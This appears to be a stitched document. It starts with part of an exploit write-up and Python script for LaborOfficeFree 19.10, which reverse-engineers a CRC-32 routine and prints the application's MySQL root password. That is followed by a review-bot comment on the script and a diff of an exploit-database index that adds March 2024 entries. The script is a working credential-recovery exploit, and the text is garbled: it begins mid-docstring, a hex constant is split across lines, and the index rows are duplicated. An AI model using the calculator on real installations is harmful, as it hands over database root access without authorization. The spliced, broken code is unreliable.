00506570 | 8B1C9D A40B8800 | mov ebx,dword ptr ds:[ebx*4+880BA4] |
00506577 | 8B31 | mov esi,dword ptr ds:[ecx] |
00506579 | C1EE 08 | shr esi,8 |
0050657C | 33DE | xor ebx,esi |
0050657E | 8919 | mov dword ptr ds:[ecx],ebx |
00506580 | 42 | inc edx |
00506581 | 48 | dec eax | eax:"hola00331-20471-98465-AA370"
00506582 | 75 D7 | jne laborofficefree.50655B |
00506584 | 5E | pop esi |
00506585 | 5B | pop ebx |
00506586 | C3 | ret |
The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries.
005065C8 | F755 F8 | not dword ptr ss:[ebp-8] |
Running this script produces the root password of the LaborOfficeFree MySQL.
C:\Users\***\Desktop>python myLaborRootPwdCalculator.py
1591779762
C:\Users\***\Desktop>
"""
#! /usr/bin/python3
from operator import xor
import ctypes
if __name__ == "__main__":
magic_str = "hola00331-20471-98465-AA370"
mask = 0x000000ff
const = [0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB
61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]
result = 0xffffffff
for c in magic_str:
aux = result & mask
aux2 = xor(ord(c), aux)
aux3 = xor(const[aux2], (result >> 8))
result = aux3
result = ~result
result = ctypes.c_long(result).value
print(result)
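Review bot: `result = ctypes.c_long(result).value` reproduces the 32-bit signed value `1591779762` shown in the docstring only where C `long` is 32 bits (Windows); on 64-bit Linux or macOS `c_long` is 64 bits, `~result` is never truncated, and the script prints a large negative number — `result = ctypes.c_int32(result).value` gives the intended cast on every platform. The `const` table begins `0x0, 0x77073096, 0xEE0E612C, 0x990951BA, …` and the loop applies `table[(crc ^ byte) & 0xff] ^ (crc >> 8)` from `0xffffffff` with a final NOT, which appears to be the standard reflected CRC-32; if that holds, the table and loop reduce to `ctypes.c_int32(zlib.crc32(magic_str.encode())).value`, which is worth confirming against the known output since it would shrink the file to a few lines. As rendered here the `const` literal is split mid-token across two lines (`0x0CB` / `61B38C`); if the committed file really contains that break it is a SyntaxError, so check the source. The header date `09/02/2023` sits oddly next to `CVE-2024-1346`; the year is probably a typo for 2024.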


@ -5536,6 +5536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java,,2020-02-03,2020-02-03,0,CVE-2019-8449,,,,, 47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java,,2020-02-03,2020-02-03,0,CVE-2019-8449,,,,,
38551,exploits/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",webapps,java,,2015-10-28,2015-12-08,1,CVE-2015-5603,,,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html 38551,exploits/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",webapps,java,,2015-10-28,2015-12-08,1,CVE-2015-5603,,,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
32818,exploits/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",webapps,java,,2009-02-25,2014-04-11,1,OSVDB-52380,,,,,https://www.securityfocus.com/bid/33912/info 32818,exploits/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",webapps,java,,2009-02-25,2014-04-11,1,OSVDB-52380,,,,,https://www.securityfocus.com/bid/33912/info
51895,exploits/java/webapps/51895.py,"Karaf v4.4.3 Console - RCE",2024-03-16,"Andrzej Olchawa_ Milenko Starcik",webapps,java,,2024-03-16,2024-03-16,0,,,,,,
50405,exploits/java/webapps/50405.py,"Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)",2021-10-13,"Mayank Deshmukh",webapps,java,,2021-10-13,2021-10-13,0,CVE-2020-10770,,,,, 50405,exploits/java/webapps/50405.py,"Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)",2021-10-13,"Mayank Deshmukh",webapps,java,,2021-10-13,2021-10-13,0,CVE-2020-10770,,,,,
48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java,,2020-02-05,2020-02-05,0,CVE-2020-8495;CVE-2020-8493,,,,, 48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java,,2020-02-05,2020-02-05,0,CVE-2020-8495;CVE-2020-8493,,,,,
48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,,2020-02-17,2020-02-17,0,,,,,, 48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,,2020-02-17,2020-02-17,0,,,,,,
@ -8983,6 +8984,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44698,exploits/linux/webapps/44698.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,linux,,2018-05-22,2018-05-22,0,,,,,, 44698,exploits/linux/webapps/44698.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,linux,,2018-05-22,2018-05-22,0,,,,,,
42314,exploits/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",webapps,linux,,2017-07-11,2017-07-11,1,CVE-2017-7175;CVE-2017-6972,,,,http://www.exploit-db.comnfsen-1.3.7.tar.gz, 42314,exploits/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",webapps,linux,,2017-07-11,2017-07-11,1,CVE-2017-7175;CVE-2017-6972,,,,http://www.exploit-db.comnfsen-1.3.7.tar.gz,
42306,exploits/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",webapps,linux,,2017-07-10,2017-07-11,1,CVE-2017-6971,,,,http://www.exploit-db.comnfsen-1.3.7.tar.gz, 42306,exploits/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",webapps,linux,,2017-07-10,2017-07-11,1,CVE-2017-6971,,,,http://www.exploit-db.comnfsen-1.3.7.tar.gz,
51896,exploits/linux/webapps/51896.txt,"Nokia BMC Log Scanner - Remote Code Execution",2024-03-16,"Carlos Andres Gonzalez_ Matthew Gregory",webapps,linux,,2024-03-16,2024-03-16,0,,,,,,
41141,exploits/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,webapps,linux,,2017-01-22,2017-01-30,0,CVE-2017-5473,,,,,http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt 41141,exploits/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,webapps,linux,,2017-01-22,2017-01-30,0,CVE-2017-5473,,,,,http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt
45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,,2018-07-27,2018-07-27,0,CVE-2018-14328,,,,, 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,,2018-07-27,2018-07-27,0,CVE-2018-14328,,,,,
40378,exploits/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",webapps,linux,,2016-09-13,2016-10-14,0,CVE-2016-5740,,,,, 40378,exploits/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",webapps,linux,,2016-09-13,2016-10-14,0,CVE-2016-5740,,,,,
@ -10519,6 +10521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,, 11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,,
1119,exploits/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - 'modlines' Local Command Execution",2005-07-25,"Georgi Guninski",local,multiple,,2005-07-24,2016-05-25,1,,,,,http://www.exploit-db.comvim-6.3.tar.bz2, 1119,exploits/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - 'modlines' Local Command Execution",2005-07-25,"Georgi Guninski",local,multiple,,2005-07-24,2016-05-25,1,,,,,http://www.exploit-db.comvim-6.3.tar.bz2,
51898,exploits/multiple/local/51898.c,"vm2 - sandbox escape",2024-03-16,"Calil Khalil",local,multiple,,2024-03-16,2024-03-16,0,,,,,,
10207,exploits/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0",2009-10-27,"Tavis Ormandy & Julien Tinnes",local,multiple,,2009-10-26,2017-07-14,1,CVE-2009-2267;OSVDB-59441,,2009-11-22-vmware86.tar.gz,,, 10207,exploits/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0",2009-10-27,"Tavis Ormandy & Julien Tinnes",local,multiple,,2009-10-26,2017-07-14,1,CVE-2009-2267;OSVDB-59441,,2009-11-22-vmware86.tar.gz,,,
40164,exploits/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys'",2013-03-06,"Artem Shishkin",local,multiple,,2016-07-26,2016-08-07,0,CVE-2013-1406,,,,, 40164,exploits/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys'",2013-03-06,"Artem Shishkin",local,multiple,,2016-07-26,2016-08-07,0,CVE-2013-1406,,,,,
47171,exploits/multiple/local/47171.sh,"VMware Workstation/Player < 12.5.5 - Local Privilege Escalation",2018-12-30,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-4915,,,,,https://github.com/bcoles/local-exploits/blob/b7da37d557636fdad1974dd407b9ff15139cd271/CVE-2017-4915/cve-2017-4915.sh 47171,exploits/multiple/local/47171.sh,"VMware Workstation/Player < 12.5.5 - Local Privilege Escalation",2018-12-30,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-4915,,,,,https://github.com/bcoles/local-exploits/blob/b7da37d557636fdad1974dd407b9ff15139cd271/CVE-2017-4915/cve-2017-4915.sh
@ -31461,6 +31464,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4871,exploits/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,webapps,php,,2008-01-08,,1,OSVDB-42936;CVE-2008-0246;OSVDB-42617;CVE-2008-0245,,,,, 4871,exploits/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,webapps,php,,2008-01-08,,1,OSVDB-42936;CVE-2008-0246;OSVDB-42617;CVE-2008-0245,,,,,
41304,exploits/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,, 41304,exploits/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,,
10403,exploits/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,webapps,php,,2009-12-12,,1,CVE-2006-6377;OSVDB-31850,,,,, 10403,exploits/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,webapps,php,,2009-12-12,,1,CVE-2006-6377;OSVDB-31850,,,,,
51897,exploits/php/webapps/51897.txt,"UPS Network Management Card 4 - Path Traversal",2024-03-16,"Víctor García",webapps,php,,2024-03-16,2024-03-16,0,,,,,,
41254,exploits/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php,,2017-02-06,2017-02-06,0,,,,,, 41254,exploits/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php,,2017-02-06,2017-02-06,0,,,,,,
9263,exploits/php/webapps/9263.txt,"URA 3.0 - 'cat' SQL Injection",2009-07-27,"Chip d3 bi0s",webapps,php,,2009-07-26,,1,OSVDB-56572;CVE-2009-2895,,,,, 9263,exploits/php/webapps/9263.txt,"URA 3.0 - 'cat' SQL Injection",2009-07-27,"Chip d3 bi0s",webapps,php,,2009-07-26,,1,OSVDB-56572;CVE-2009-2895,,,,,
17937,exploits/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,webapps,php,,2011-10-07,2011-10-07,0,OSVDB-83885,,,,http://www.exploit-db.comurl-shortener-script.zip, 17937,exploits/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,webapps,php,,2011-10-07,2011-10-07,0,OSVDB-83885,,,,http://www.exploit-db.comurl-shortener-script.zip,
@ -32587,6 +32591,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3622,exploits/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - 'WebMail' Remote Add Super User",2007-04-01,rgod,webapps,php,,2007-03-31,2016-09-29,1,OSVDB-34677;CVE-2005-3811,,,,, 3622,exploits/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - 'WebMail' Remote Add Super User",2007-04-01,rgod,webapps,php,,2007-03-31,2016-09-29,1,OSVDB-34677;CVE-2005-3811,,,,,
10653,exploits/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61350;CVE-2009-4678,,,,, 10653,exploits/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61350;CVE-2009-4678,,,,,
18290,exploits/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,webapps,php,,2011-12-29,2011-12-29,1,CVE-2011-5026;OSVDB-78070,,,,http://www.exploit-db.comwinn_guestbook_v2.4.8c.zip, 18290,exploits/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,webapps,php,,2011-12-29,2011-12-29,1,CVE-2011-5026;OSVDB-78070,,,,http://www.exploit-db.comwinn_guestbook_v2.4.8c.zip,
51893,exploits/php/webapps/51893.txt,"Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)",2024-03-16,tmrswrr,webapps,php,,2024-03-16,2024-03-16,0,,,,,,
51591,exploits/php/webapps/51591.txt,"WinterCMS < 1.2.3 - Persistent Cross-Site Scripting",2023-07-15,"abhishek morla",webapps,php,,2023-07-15,2023-07-15,0,CVE-2023-37269,,,,, 51591,exploits/php/webapps/51591.txt,"WinterCMS < 1.2.3 - Persistent Cross-Site Scripting",2023-07-15,"abhishek morla",webapps,php,,2023-07-15,2023-07-15,0,CVE-2023-37269,,,,,
39332,exploits/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-27,1,OSVDB-107116,,,,,https://www.securityfocus.com/bid/67481/info 39332,exploits/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-27,1,OSVDB-107116,,,,,https://www.securityfocus.com/bid/67481/info
3686,exploits/php/webapps/3686.txt,"WitShare 0.9 - 'index.php?menu' Local File Inclusion",2007-04-08,the_Edit0r,webapps,php,,2007-04-07,2016-09-30,1,OSVDB-34735;CVE-2007-1928,,,,http://www.exploit-db.comwitshare-0.9.zip, 3686,exploits/php/webapps/3686.txt,"WitShare 0.9 - 'index.php?menu' Local File Inclusion",2007-04-08,the_Edit0r,webapps,php,,2007-04-07,2016-09-30,1,OSVDB-34735;CVE-2007-1928,,,,http://www.exploit-db.comwitshare-0.9.zip,
@ -40518,6 +40523,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44342,exploits/windows/local/44342.txt,"LabF nfsAxe 3.7 - Privilege Escalation",2018-03-26,bzyo,local,windows,,2018-03-26,2018-03-26,0,,,,,, 44342,exploits/windows/local/44342.txt,"LabF nfsAxe 3.7 - Privilege Escalation",2018-03-26,bzyo,local,windows,,2018-03-26,2018-03-26,0,,,,,,
46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,,2019-04-22,2019-04-22,0,,Local,,,http://www.exploit-db.comnfsaxe.exe, 46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,,2019-04-22,2019-04-22,0,,Local,,,http://www.exploit-db.comnfsaxe.exe,
46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,,2019-04-22,2019-04-22,0,,"Buffer Overflow",,,http://www.exploit-db.comnfsaxe.exe, 46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,,2019-04-22,2019-04-22,0,,"Buffer Overflow",,,http://www.exploit-db.comnfsaxe.exe,
51894,exploits/windows/local/51894.py,"LaborOfficeFree 19.10 - MySQL Root Password Calculator",2024-03-16,"Peter Gabaldon",local,windows,,2024-03-16,2024-03-16,0,,,,,,
48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,,2020-05-12,2020-05-12,0,,,,,, 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,,2020-05-12,2020-05-12,0,,,,,,
40567,exploits/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,local,windows,,2016-10-18,2016-10-18,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-10-18-at-192511.png,http://www.exploit-db.comlanspy_setup.exe, 40567,exploits/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,local,windows,,2016-10-18,2016-10-18,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-10-18-at-192511.png,http://www.exploit-db.comlanspy_setup.exe,
46009,exploits/windows/local/46009.py,"LanSpy 2.0.1.159 - Local Buffer Overflow",2018-12-19,"Juan Prescotto",local,windows,,2018-12-19,2018-12-19,0,,Local,,,http://www.exploit-db.comlanspy_setup_2.0.1.159.exe, 46009,exploits/windows/local/46009.py,"LanSpy 2.0.1.159 - Local Buffer Overflow",2018-12-19,"Juan Prescotto",local,windows,,2018-12-19,2018-12-19,0,,Local,,,http://www.exploit-db.comlanspy_setup_2.0.1.159.exe,
